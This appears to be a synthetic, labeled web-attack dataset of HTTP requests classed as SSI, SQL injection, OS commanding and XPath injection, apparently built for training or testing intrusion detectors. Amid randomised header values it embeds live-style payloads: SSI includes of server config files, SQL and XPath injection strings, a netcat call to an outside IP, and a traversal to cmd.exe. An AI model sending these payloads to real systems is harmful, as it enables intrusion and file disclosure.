Last-Modified: Fri, 04 May 07 01:21:53 GMT
Host: www.bIOems.cz:3880
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: be-Nfnalne, e-athaEll, dohr-wa, lnttBEe-Ennvsh;q=0.6, tbc9o-I;q=0.8
Cache-Control: no-store
Client-ip: 159.172.8.1
Cookie: Iscvseei5l=9153;Escetws2tha=1u9fr<imglaenr
Cookie2: $Version="933"
Date: Fri, 25 Nov 05 07:34:03 GMT
ETag: "Nv0QvUJOxsi0Rwy_"
Expect: 5teotwi=c4dkufDm;eodxa=0orrzrci
From: ohoe@b9a8.de
If-Modified-Since: Fri, 20 Jun 08 24:26:02 CET
If-Unmodified-Since: Wed, 21 Jul 04 14:16:46 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 4.6
Pragma: oAene=tgi9
Proxy-Authorization: Basic dzZubjptdHlo
Authorization: Basic TmFycjowR3RZaA==
Range: 8542-,-709
Referer: http://Rtars57.gov/N0aN/tesjl/ykxtaes/oefeuef.nsf
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.1 (compatible; MSIE 2.1; Solaris; qsuai)
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0076x674
Via: FTP/3.1 www.aNes.tiff, fraa/8.9 178.36.234.229
Transfer-Encoding: gzip
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 321 92.208.70.203:11 "elAnigceatyit1" "Sun, 21 Nov 04 10:31:52 UTC"
X-Forwarded-For: 37.2.49.250
X-Serial-Number: 145776
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tNaderstqs=oPW6Bi&HpX-V=elwf&BxQUX=Ot95rah&et7mrssmrnteh=sbu3zPmJPI&hEtChtrce=sVdnfe24fd9(i(r&etdzmmMtlBonaag=ho_Y.m2&hr=o6I-3OQ@z&exienxsdiIws=doc(   file:///c:/eer/rsibAas.xml)&asewiccrrket=06711179&Dheatttei4et=a25XL&aquaSeehtlAo1=5qNpahaseenme0as&eGutfrrfo8ivt=tg&t4oso0=t&elgteMlge2oT=83284&eohwbejcnmiys=66

End - Id: 44708
Start - Id: 39817
class: SSI
GET /dH/EnecilervwiA1iootgso/FlQ6.asmx?c45i=se&TJCnlFz=T%27a%3E&2tltnr0jia=doGgU&if5inia89ea=%3C%21--+++++%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&orzr62uP=owEsJ6&1gruQt6=3776944&ER4FFa=nenmhaCT&xix2lDe5asB3xt=ohidIexeceoea&re=jaiy%3Awo%25eeah-ra&joSl=vbscripthqrpassthrueosaaodanu&r3esaqne=lmOn.cSu&eh=s8lals1hlhol8rmu&5E=ijRyservices&yTlgzh1i=ErlMruimgt%3D HTTP/1.0
Host: www.edtybfem5i.com:80
Connection: sabf
Accept: */*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 179.116.196.3
Cookie: oDieoNuypnin=cfllnd
Cookie2: $Version="15"
Date: Fri, 02 Apr 04 09:19:38 GMT
ETag: "I6yhHlZTU9vTgujE7k"
Expect: 100-continue
From: fEkbo16t@uycIttryA.biz
If-Modified-Since: Sun, 05 Nov 06 19:33:22 UTC
If-Unmodified-Since: Sat, 01 Nov 08 02:31:46 UTC
If-Match: "_LccIDvC5no0flx"
If-None-Match: "Nmc-0ouB@UgzXstw9tsc"
If-Range: Fri, 19 Mar 04 18:19:02 GMT
Max-Forwards: 05
MIME-Version: 8.2
Pragma: Psish=e2susee
Proxy-Authorization: Basic YWVzeXVhOmVtbm5uZmk=
Authorization: Digest username="oeue"
Range: 907419-6,527-485395,5-64
Referer: /tseeano8/yenas.fgf
TE: chunked;q=0.7,trailers,trailers
Trailer: Connection
User-Agent: cewcnEaipr/5.9.5.9
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9632x079
Via: 9.4 232.33.104.2, FTP/0.7 87.1.80.182:9
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 728 www.6meT.htm "tbadlt3aeEaT" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39817
Start - Id: 35092
class: SqlInjection
GET /egWr.aspx?iqotwacnwi=tbj%3Ckrci+4u%3Dnwhhty+l&id2Sse=drsnh HTTP/1.0
Host: www.oyag.be
Connection: close
Accept: video/mpeg
Accept-Charset: *;q=0.1
Accept-Encoding: and   0<>(select  count(*)   from     esalu  where 3ltThrhz<>)
Accept-Language: hu-tes9;q=0.4, 9ebnLs-eometE, 9-c;q=0.7, dc-jerimN;q=0.1
Cookie: Wod4sersnsot=a;ueEoe=57490428;bblike0dkp=isdf6adde;olMQ2PA=oNtgy;dhzsasfs=044
Cookie2: $Version="68"
Date: Sun, 16 Aug 09 14:11:25 CET
If-Modified-Since: Sun, 24 Jan 10 13:51:01 GMT
If-Unmodified-Since: Sat, 26 May 07 22:47:37 UTC
Max-Forwards: 9273
Pragma: nkca=caOlte
Authorization: Basic eW9Pa3QyOmZkdGs=
Range: 3473-9
Referer: http://r2eI.net/ItsT9u/huta/niirErs4.nsf
TE: deflate;q=0.4,gzip;q=0.0,deflate
Trailer: Authorization
User-Agent: Mozilla/8.4 (Machintosh; U; PPC Mac OS X 7.6; ih-Jh; rv:3.4.4) Gecko/89982923
UA-Pixels: 5466x0734
Transfer-Encoding: bneiuU; reotrew=saite
Upgrade: njf/2.0, p8qf/8.5, qie/3.4
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35092
Start - Id: 40853
class: SSI
GET /eDpl/nScm41raEu.css?qostotz=8210895&K_aB7m3An652=350731&dzemeum=%3C%21--++++%23odbc++connect%3D%227eee%2Cryat5%2C74gJa%22++statement%3D%22select+*++from+xl%22--%3E HTTP/1.0
Host: 36.242.143.169:651
Connection: vmrium8v
Accept: */*
Accept-Charset: iso-8859-4, euc-kr;q=0.2, cp-932
Accept-Encoding: compress;q=0.7, compress;q=0.4, deflate, deflate;q=0.9
Accept-Language: h3r-sl;q=0.9, lCnd5h-el9E67e;q=0.0, il-hn;q=0.4, yud-eseantes, ieat2-n7tn7et;q=0.7
Cache-Control: max-age=1
Client-ip: 183.188.60.40
Cookie: tec=nn;zgytAst=re1toi;easr=oii Ey;cihadt7=Pax3ora80r;KcopyQtrcpcO=kq2DwV.
Cookie2: $Version="05"
Date: Fri, 29 Aug 08 14:39:26 UTC
ETag: W/"jRPNJB5BEWnF@73BXiH"
Expect: hw5e
From: ttntvsh@tetyoEibr.uk
If-Modified-Since: Fri, 13 May 05 10:08:37 GMT
If-Unmodified-Since: Mon, 24 Sep 07 15:32:54 UTC
If-Match: *
If-None-Match: "cnPmCTzidCptVT6dbY"
If-Range: Wed, 12 May 04 18:12:06 CET
Max-Forwards: 751
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="li7or"
Authorization: Digest uri=http://oo7ich.fr/nILa.rar
Range: 89-7,-933
Referer: http://www.nee3.de/oro0ib.bin
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/5.3 (Machintosh; U; Mac OS X 7.5; Zd-sn; rv:7.1.6) Gecko/04441161
UA-CPU: Sparc
UA-Disp: 2426,7787,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5993x410
Via: 3.2 www.tf1ih.html:1224
Transfer-Encoding: compress
Upgrade: iTdaap/8.9
Warning: 587 136.89.138.222 "srssp" "Sun, 31 Dec 06 15:59:03 UTC"
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40853
Start - Id: 41435
class: SqlInjection
POST /59jeeluodaeabrarE/ibLwbd/rAf.ByrterfEI_PLvhdx/e@.-3T/tdfsuIoutaren4uh0Rdn/tFtl3utnutsl/ipdXFm81gdNyET/lNtwnc/hLndfoErwr2nrw.jsp? HTTP/1.1
Content-Length: 328
Content-Language: a,toeram,iu44
Content-Encoding: compress
Content-Location: /dat0wjg/ynTo9eee/stla.aspx
Content-MD5: aWJ6eHJ1YmhlZnRubWRncg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Aug 07 12:11:03 UTC
Last-Modified: Fri, 23 Nov 07 14:35:39 CET
Host: www.nmbxuirel.biz:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: lh-s6xeapgE, idtf1-Wnrados;q=0.4, ooldoae-fedeen, dtynr-7u08eot;q=0.7, oerjTn-eh6tged;q=0.7
Cache-Control: min-fresh=136
Client-ip: 196.211.227.198
Cookie: rtbh19h=8351;drrhe2n7tstghh=anouig;taNhiotalNwtno=hzb3 m5systemDu=2dt;et8=e rsiealtdocumentw;rrfedeiwimyhb=6329
Cookie2: $Version="67"
Date: Tue, 25 Apr 06 07:38:23 GMT
ETag: W/"VY5DZ71S9_MGkrI4yJ"
Expect: enoavte1=egee
From: m7bmf@6ittvesi.net
If-Modified-Since: Thu, 08 Jun 06 17:27:45 GMT
If-Unmodified-Since: Tue, 06 Oct 09 09:16:45 UTC
If-Match: *
If-None-Match: "fC_FxN4kEMgnWxAyW925"
If-Range: ".lXwLS1Jjq6vq.LA56g"
Max-Forwards: 5
MIME-Version: 0.4
Pragma: iszex4e='Eroi'
Proxy-Authorization: Digest qop=ymsaBhdy
Authorization: NTLM b3NiZU1FY3d1ZmUzMGhvaGV3U25yb25vb0V0Ym5lN2Vo
Range: -86
Referer: /iusde/nwfRI/at5eae/8wsa/febwt.tar.gz
TE: deflate;q=0.2
Trailer: Date
User-Agent: pK4AGyg http://www.rsomorP.st
UA-CPU: MIPS
UA-Disp: 5047,1180,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x118
Via: 8ep/9.3 165.94.165.5, 5.4 www.mxotm.gif:18090, oupu/2.5 www.tHmahw7t.tiff:96
Transfer-Encoding: identity
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 594 www.eduo.css "iv5whwy" "Sun, 10 Aug 08 19:07:44 UTC"
X-Forwarded-For: 47.63.17.194
X-Serial-Number: 9168693821015244526
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

EgerqiuDats=ezjBc7tnD&a4ti9nyrO5a=simto7&Fwindow.openZ6EXZt=ea&tiavp6eAyors=43240&ai2sbrh=s&rNa6s5cO=81636&hsabeR9eue=ta&osdt1o=(reh2&bhotce9IEe=09659823&woezEh0tlAUdhan=nLEz&KayHkmM9=]eLsvarp&3Ylinkk6cmdRKbK= 9esCwe f2e&cstpEppes=cfttilsae$RTe s&rieatsiol=OR     'od'     =    'Sim'+'ple'&fLIzPJPC=8007382

End - Id: 41435
Start - Id: 39153
class: SSI
GET /r_8hD3-EcD@nY1ulx/nHJUhrf-/eEtnin/rbsarsidus/trsU9renlhghuwSlce4s/ifaRAnI/aamlhewewermxehhtlY/tmpoOAGBW/detg/tvbscriptQ4.htm? HTTP/1.1
Host: www.ttte4upk.net
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 84.113.21.246
Cookie: 6rQTHBABT=<!--#echo var="date_gmt"-->
Cookie2: $Version="117"
Date: Sat, 20 Feb 10 18:35:56 CET
ETag: W/"ZHnd7fqGl_H.gppZJp"
Expect: fblW6h
From: ectdj@6rt19rcai.com
If-Modified-Since: Wed, 15 Nov 06 15:28:41 CET
If-Unmodified-Since: Thu, 13 Jul 06 01:38:53 GMT
If-Match: *
If-None-Match: "hD7AuL5JPb2ECW3shw"
If-Range: Tue, 07 Sep 04 09:41:32 GMT
Max-Forwards: 6222
Pragma: no-cache
Proxy-Authorization: 0vsnrs eehysnd=1fiFjer
Authorization: NTLM dXZ5czFyaHB0Ylp0c3M5ZWVpbm5nMHFzSFRwZWllYTFvYWRkaHRxZW9u
Range: -6701
Referer: /tasdi7sr/crgn/sehen.mdb
TE: trailers
Trailer: Connection
User-Agent: ob1q82f http://www.Ad4a.biz
UA-CPU: PowerPC
UA-Disp: 016,7068,8
UA-OS: Solaris
UA-Pixels: 308x434
Via: 8.0 www.zsSqO.gif:582
Transfer-Encoding: Nyae
Upgrade: sNrPh/3.1, DArw/8.8, seEv0h/6.6
Warning: 430 218.56.203.53 "ebsaieatngcc1Ede" 
X-Forwarded-For: 83.220.235.130
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39153
Start - Id: 40936
class: SSI
GET /bIR6k2jqt9/ndtehet3aoht/o2hof/egRGOkFI1s7Ri5/ealAnerl/anoske3suedrnoobm2e/eier8k3ht1aOe/nirtchhaeacrhhdKN/9O.mspx?dnevaagcssaheh2=xAim149os&w6Xw_=dkEGel6&8lY914Q0PY=n5h&gk9nazagtLnies=eNUKyu5uUxz&Oxyl3bftoa=2983849&DbB6s=er3ahsee%3D&naEsgaf=cey&wgsUatoSktemeO=1&oaoshk=ti+%25ueeriiea8sne+&t9nsudFsbnlaji=28&oTohEnkAlzh=%3C%21--%23odbc+connect%3D%22seai%2Cle%2Cvnt%22++++++statement%3D%22select+++++*+++from+++atlsc%22--%3E&c9ai=wehsnar%3Fdt&nF5eOUFY=%26cius+Ctrtf7Sh&t5hvuo=5134215976&zd6egihwltzkSpn=lrrccxsH HTTP/1.0
Host: www.fteh7.biz
Connection: close
Accept: */*;q=0.3
Accept-Charset: cp-950;q=0.4, windows-1257;q=0.7, iso-8859-5;q=0.0, iso-8859-7;q=0.2
Accept-Encoding: *
Accept-Language: cse5Ed-np
Cache-Control: m='sa5xie'
Client-ip: 214.42.169.226
Cookie: kl@R@eMH=elog(dhe]ejnph-o:rhome/%rn?;etiksBaltcmneaw=sqN;mt=iZB;SdarbtswhOeioo3=rdivriab;ehys9a=6339;tmWaolmtlr0oski=3sq6mitro'iday
Cookie2: $Version="9"
Date: Thu, 19 Nov 09 13:24:25 UTC
ETag: W/"8masr5MiUJT4dyo4siJ"
Expect: 100-continue
From: jzt9n3q@3ah1fe6g.be
If-Modified-Since: Thu, 11 Sep 08 02:03:07 UTC
If-Unmodified-Since: Fri, 11 Dec 09 06:25:19 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 15 Dec 05 18:12:00 UTC
Max-Forwards: 701
MIME-Version: 6.7
Pragma: pjwMe=he50
Proxy-Authorization: Basic b3NUbmNmOmFlZXdocg==
Authorization: NTLM MmV1cmNyaWFkemlXd2VvemhuenNlbWg5Z2xjcjBhYWhhYXJlaA==
Range: -25
Referer: /nijoW/ah9t/wIannehe/8d3eV3n.swf
TE: trailers,deflate;q=0.3,gzip
Trailer: Upgrade
User-Agent: Mozilla/1.1 (Machintosh; U; Mac OS X 5.3; an-tt; rv:8.2.9) Gecko/24980774
UA-CPU: 68000
UA-Disp: 661,5118,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4871x5124
Via: eLn/7.8 146.122.153.248
Transfer-Encoding: identity
Upgrade: 7hos/6.7, so3/0.2
Warning: 449 15.9.73.171:0699 "asavorrc" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: ------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 40936
Start - Id: 41238
class: SqlInjection
GET /yriaraaoausnaar/Oe8atrf1eonobu/pzn4jag/hmextse/7elrbaoaiDdeo/ODEjsdsepy/ov711sto_g0fj/aeo/f713mkMzaxCyvi@/nyg/vA0rexanoeynefeye/tndrn.png?zwisfa=i05&deu1cclmr6oioeh=k2sD2&o8nmsycdtz=+&nnrtro=+ftpearfwp-U%5C%281e%5C+hFlibT%3An&ohzmohrektthep=rS9UzhX&mismleo7at=fhb%40-wAVtgt&srtlgtaiiiseza=erT%40MAO-bV&e1lWer=aYJhXHZY&sihhnDme=asdty8CeFcltrcpp&f.Vq492=061106&OahbiI=10&Gweniemrtoso0in=5miw&rretteaintotCao=32 HTTP/1.1
Host: www.hdhsti0Otn.biz:80
Connection: eo88d1p
Accept: image/png;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: or  0<>(select     count(*)    from  2sial)
Accept-Language: 6yea-eioyo;q=0.9
Cache-Control: no-transform
Client-ip: 137.5.183.29
Cookie2: $Version="2"
Date: Sun, 18 Apr 10 08:07:59 CET
ETag: W/"P9Niq6_s0DQ2KH.n-Hv"
Expect: 100-continue
If-Unmodified-Since: Tue, 29 Dec 09 16:06:02 CET
If-Match: "suG8Z_a.AM3Gjlt0tU"
If-None-Match: "VpPG3EnI8skUU4Z5cDCP"
If-Range: Sun, 13 Nov 05 12:39:23 CET
Max-Forwards: 09
MIME-Version: 4.6
Authorization: NTLM YXJ3ZWRoMGVDd0FoT251MG5ydGxoYmV0bGoxZUVlUmRuN29laQ==
Referer: /ouacaL/kpPreeML/wbso.wmn
User-Agent: ee1x/7.2.8.5.2
UA-OS: Linux
Via: osliew/7.6 www.ulnnrpjT.gif:2871, 0.7 www.odmolwT.jpg, HTTP/9.8 19.112.124.173
Transfer-Encoding: gzip
Upgrade: rcdj/3.1, inENh/7.9, ntlxn/9.4
X-Forwarded-For: 248.13.251.126
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41238
Start - Id: 42915
class: OsCommanding
GET /To/soa3jencAol/gno/akz3SgPamImJ/eiuhrfIat/er0etae6mdzni/legch8tdscosec4tontm/iTW.qZuhPV6WGo8Sw.html?oldeofulwomH=36541387&bt6pioyLeratne=njEd0q2emaMv&nio1vhfuanta=a&dherohehreeymt0=s22htnbs&uerG=Dtut%2B&ai8=t566X&wmwodbkdy=tegnhinuredeoeR&kueoOa4jI7pkl=thnph-a0fromt5m%2Ft%25ta&tH34=273410&6Qf6Lb=3855&3sj3TAa=e HTTP/1.1
Host: www.ognhscatso.ch:2086
Connection: close
Accept: */*
Accept-Charset: euc-cn, koi8-r, euc-jp;q=0.5, big5;q=0.4, us-ascii;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: bceaoZpn='4nyk'
Client-ip: 216.204.56.99
Cookie: IXGaPoIbdx=2y.S1S;3moei= iframegcf;KB3K6O4A3Gb=l3FHUQ5Eon;tlrnutelotyt=7eme;tttnrvHeNy=r75UbI
Cookie2: $Version="35"
Date: Fri, 01 Jun 07 01:28:30 CET
ETag: "TTHdaLYIysL7J7zX"
Expect: 100-continue
If-Modified-Since: Tue, 10 Feb 09 06:46:32 UTC
If-Unmodified-Since: Fri, 18 Apr 08 07:44:03 CET
If-Match: *
If-None-Match: "H4Dx@E26F8EHPVe"
If-Range: *
Max-Forwards: 2207
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic NGVpZWE3Om5uYWg=
Range: -09,53938-,-91
Referer: http://www.hilebhe.biz/eenss/17cu/eduiGzp/lnFn/rst4Ieh.mpg
TE: chunked,chunked
User-Agent: |    /usr/bin/nc -vvv  26.194.210.233 80%00
UA-CPU: x86
UA-Disp: 0478,435,16
UA-OS: Windows 98
Via: HTTP/8.8 186.54.26.152, 2.0 www.aieeiolT.tiff, 5.3 235.102.137.209:46775
Transfer-Encoding: gzip
Upgrade: Ftn/2.1, uigtMM/5.4
Warning: 992 www.tgxepEC.tiff "yer0iasse4hhsuslog" 
X-Serial-Number: 71827

null

End - Id: 42915
Start - Id: 49928
class: XPathInjection
GET /WQ62E1byX3.includelike/rAGKYWMN69.7jYNT/pBgMesnOg3xJgZ5iBV/e3Huu.z/LaCVnBftpl7/rfmytJbH1FOrz_nS/a5onefx1p7/th3yy/sA_PT4gH4gRn/uy_RSK@rW@1mxzKk9u/ataewe/eVy1Xrk.exViRpQ8E.jpeg?0f30rGo=20att&am1yenh5s6duri=44&wn=co%27+or+++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28++++i++%2B+j+%2B+++k++%2B++++l%2B1%29%5D++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++%27atdl%27+++%3D++%27+++++5eUic%27+or&ese9=ttyq9nid%24lhnuhtacces&aoetxOr3=e5i6aan7 HTTP/1.1
Host: 3.186.162.113
Connection: keep-alive
Accept: application/*, application/rtf;q=0.9, audio/x-wav
Accept-Charset: koi8, iso-8859-9;q=0.9, windows-1254;q=0.5, utf-8, x-mac-hebrew;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 69.149.110.120
Cookie: 2htreynulilyNt=t 2tmp;vnoodt0rw=ostSFtlF>execs4I;r5t9a7adi5ta1st=evalneDeu
Cookie2: $Version="5"
Date: Fri, 19 Mar 10 23:08:42 CET
ETag: "-PkzT_C75R64usx5m"
Expect: 100-continue
From: anuul0@opadyrcN.cz
If-Modified-Since: Mon, 13 Nov 06 24:52:39 GMT
If-Unmodified-Since: Sat, 03 Jan 09 17:25:51 GMT
If-Match: *
If-None-Match: *
If-Range: "9NtuvThsKoOxD9B6dr9z"
Max-Forwards: 2
MIME-Version: 7.8
Pragma: aty=op
Proxy-Authorization: Basic bmJ2ZWFpcjpoZWk0cmhhVA==
Authorization: besh 2agae=u9pira
Range: -9495
Referer: http://al2itt.be/iayguz1/weeb/knaa.gz
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.0 (compatible; Konqueror/4.7; WinNT; Awll)
UA-CPU: MIPS
UA-Disp: 3308,0110,8
UA-Pixels: 299x2707
Via: FTP/7.9 200.91.248.156, 1.2 www.Wietryu.png, 8.3 180.50.32.187
Transfer-Encoding: deflate
Upgrade: qfe/8.0
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 2013029504
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49928
Start - Id: 36553
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 87.111.116.166
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.3
Cache-Control: max-stale=681
Client-ip: 131.100.188.215
Cookie: eaase3loilmrio=588;ttn=215;n6u=5rt3.7Sp1J;wxTcD=cks;VeesexgR=uneeperl O[Ic4m%t;or7y2otR=94
Cookie2: $Version="7"
Date: Wed, 18 Jun 08 03:37:10 UTC
ETag: "._sHr99T4AKY.QbUteoU"
Expect: 100-continue
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Sun, 12 Nov 06 19:21:23 GMT
If-Unmodified-Since: Sat, 26 Apr 08 23:56:22 GMT
If-Match: "lPMQwEleva0g07Cz269l"
If-None-Match: *
If-Range: Thu, 17 Aug 06 15:44:34 UTC
Max-Forwards: 97
MIME-Version: 5.7
Pragma: romm=ta
Proxy-Authorization: Digest nc=Ad95328B
Authorization: NTLM cmlvb2Fvb2luaGRzaGp0czdvd2xvYWhrNDR0Z2VhbGEwYXppdGk0Ym5kc2tB
Range: -7292
Referer: /qatiEoa/w0drtBoe/ghey/ElwNsi.sh
TE: deflate,gzip
Trailer: Warning
User-Agent: ou7Pa/3.1.6
UA-CPU: x86
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 547x5195
Via: 8.6 83.226.211.193, HTTP/4.5 253.69.13.41
Transfer-Encoding: identity
Upgrade: syjne/7.2
Warning: 384 103.114.33.177 "eR8ioli" "Sat, 15 Oct 05 19:32:06 GMT"
X-Forwarded-For: 103.73.131.132
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36553
Start - Id: 41530
class: SqlInjection
POST /lnlc4rs18Rtoc3H/t./o6r/AsbE7itpUer9yedrh/Rfgs/yv/sMs/psnlincff/h9F8IOtelnetmetaDF/umu1entiCi5ftiw/rem6baorofrasla/1lFoG8yXFOhavingautoexec.asp? HTTP/1.1
Content-Length: 369
Content-Language: astw
Content-Encoding: compress
Content-Location: http://www.eeeeada.st/isNieve7/ltnotonZ/9aooaee/ekels.mspx
Content-MD5: dGFlYW4yNGdpMXdtckpvaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Nov 07 11:24:27 UTC
Last-Modified: Tue, 24 Mar 09 17:48:02 CET
Host: www.esdmin.cz
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i, x-mac-icelandic;q=0.8, windows-1257;q=0.1, hz-gb-2312
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 194.192.129.109
Cookie: 9apassthrullpassthrufgPqKh= 9e)~;oi=eAmT90wm3LXC
Cookie2: $Version="988"
Date: Mon, 04 Oct 04 13:23:50 UTC
ETag: W/"yNW8OB@YMKq2YVr1"
Expect: maEbbf
From: tdvdi@oee6.st
If-Modified-Since: Fri, 07 Mar 08 09:52:12 UTC
If-Unmodified-Since: Fri, 23 Jun 06 11:15:32 UTC
If-Match: *
If-None-Match: *
If-Range: "ZuTCaNQcOg1yHTLv0b"
Max-Forwards: 4951
MIME-Version: 0.0
Pragma: flsssyA='Mmayeipa'
Proxy-Authorization: NTLM dEU5ZGE5bXRvc1NwYVNlZXlueGFwM3RqdHRuZkJkYWRmYWI0
Authorization: NTLM dDdtT2psZHNoZU5vOXBldGZpbnRwYTdlaGpsaGZoN3RzbEI2ZHJvTDc=
Range: 911566-290,4666-98
Referer: /3tknni.jsp
TE: trailers,deflate;q=0.6,trailers
Trailer: Pragma
User-Agent: eldn0 (cM-36z; tt8II-e)
UA-CPU: MIPS
UA-Disp: 016,5858,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: hxcmla/9.5 www.gisv.js, 9.8 207.0.249.91:998
Transfer-Encoding: compress
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

st6uosuutp=ohGeridxy eTre&A0V-R@yi8=7757838038&aEie6=xdnbtsisf;&aiete3eada=tDD97YMy&arhm5slPC6fvbscript=44888674&xe4chsE8ophe1t=uafSY5D13&svaajcrao1e4c=09&et='     +   ( SELECT   TOP    1   hsc  FROM   idd)    +     '&1kNAzBRhI_Ostyle=hpryDd2MYu&nph-EIrcphm= imor7document go+r-cw&d0h=77&null_PY=0anhf&sdirgaucjwgn=aChvDUpcXWvx&d8Ld=46533813&i7=iframeie

End - Id: 41530
Start - Id: 42405
class: SqlInjection
GET /ydobsSezy.dll?havingPwp-f0d=385420&UapasswdIncD=be%3Daate%3F-i5&QUdI0FctmdropZJ=599&u14j7maiE=pcuhownEejeQ9&HIPAKzVopen4Qs.=5boot.inig%7E&-2imgWs1k=71069&7rLe=opvbscript7ewrTsthttpsre%3DnAa&yai=%27+++OR+%27tIteainhali%27+++%3D+++++%27erjt%27%2B%27cd%27&sto=534&hPRoaote0sseesA=sPa&dthResc3asze=A1oeboot.init+d%25r&Sfneoesq=opt&zrudlrtsrUere6=0190936&xbgsoundP%u9_ei=acuslincxieWdf0&72ra=9sTo HTTP/1.1
Host: www.0leE.st
Connection: close
Accept: */*
Accept-Charset: macintosh, iso-8859-3;q=0.0, windows-1252;q=0.7
Accept-Encoding: deflate, gzip;q=0.0
Accept-Language: ne8-n, 3qrv0-sevent;q=0.3, uQHcya-h, Ch-ookne;q=0.7, s-ontuted;q=0.8
Cache-Control: no-cache
Client-ip: 161.232.72.123
Cookie: G1eechoSTGN=qinserth06otereohincludeel;oresata1coa5s=29;LswBfopen=ecnNeewalhteei6;u6=250653;Fii=528904
Cookie2: $Version="12"
Date: Tue, 15 Jun 04 09:54:29 GMT
ETag: "Ih__Fx4k.oUhLqaWav7"
Expect: 100-continue
From: 1tXiees@Csgv.st
If-Modified-Since: Sun, 18 Mar 07 10:37:17 GMT
If-Unmodified-Since: Sat, 15 Aug 09 06:47:05 GMT
If-Match: "-qJPpMtdJbEcP_uqU6rS"
If-None-Match: *
If-Range: *
Max-Forwards: 71
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: JslOti auhh=xthke
Authorization: Basic ZXNkdTphYjBlYWs=
Range: -4,92807-997,-01613
Referer: /ojif/i2iulm/jnedeg/nacuHln.php3
TE: chunked;q=0.7
Trailer: Host
User-Agent: l0Sw/5.5
UA-CPU: StrongARM
UA-Disp: 156,101,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 189x646
Via: 0.4 www.wnylltk.htm
Transfer-Encoding: gzip
Upgrade: 2ac/9.1, rwme/4.7
Warning: 593 www.ibdmueus.shtml "Egye9eoeioV6AwrcnL" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 67876
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42405
Start - Id: 49704
class: XPathInjection
